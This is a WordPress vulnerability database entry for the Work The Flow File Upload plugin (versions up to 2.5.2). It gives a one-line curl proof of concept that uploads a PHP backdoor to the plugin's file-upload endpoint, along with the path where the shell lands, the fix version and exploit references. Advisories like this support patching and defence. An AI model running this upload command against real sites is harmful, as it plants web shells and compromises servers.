WordPress Plugin Vulnerabilities

Work The Flow File Upload <= 2.5.2 - Shell Upload

Description

PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php

Affects Plugins

Plugin icon
work-the-flow-file-upload
Fixed in 2.5.3

References

Exploitdb
36640
URL
exploit/unix/webapp/wp_worktheflow_upload
URL
https://packetstormsecurity.com/files/#131294/
URL
https://packetstormsecurity.com/files/#131512/
URL
https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/

Miscellaneous

Submitter
Claudio Viviani
Submitter website
http://www.homelab.it
Submitter twitter
homelabit
Verified
Yes
WPVDB ID
a49a81a9-3d4b-4c8d-b719-fc513aceecc6

Timeline

Publicly Published
2015-04-04 (about 10 years ago)
Added
2015-04-04 (about 10 years ago)
Last Updated
2019-10-21 (about 6 years ago)

Other

Published
Title
Published
2016-06-03
Title
WP Mobile Detector < 3.6 - Unauthenticated Arbitrary File Upload
Published
2020-09-21
Title
Drag and Drop Multiple File Upload – Contact Form 7 < 1.3.5.5 - Unauthenticated Remote Code Execution
Published
2024-10-30
Title
Helloprint < 2.0.5 - Unauthenticated Arbitrary File Upload
Published
2021-04-10
Title
Classyfrieds <= 3.8 - Authenticated Arbitrary File Upload to RCE
Published
2023-11-01
Title
Icons Font Loader < 1.1.3 - Admin+ Arbitrary File Upload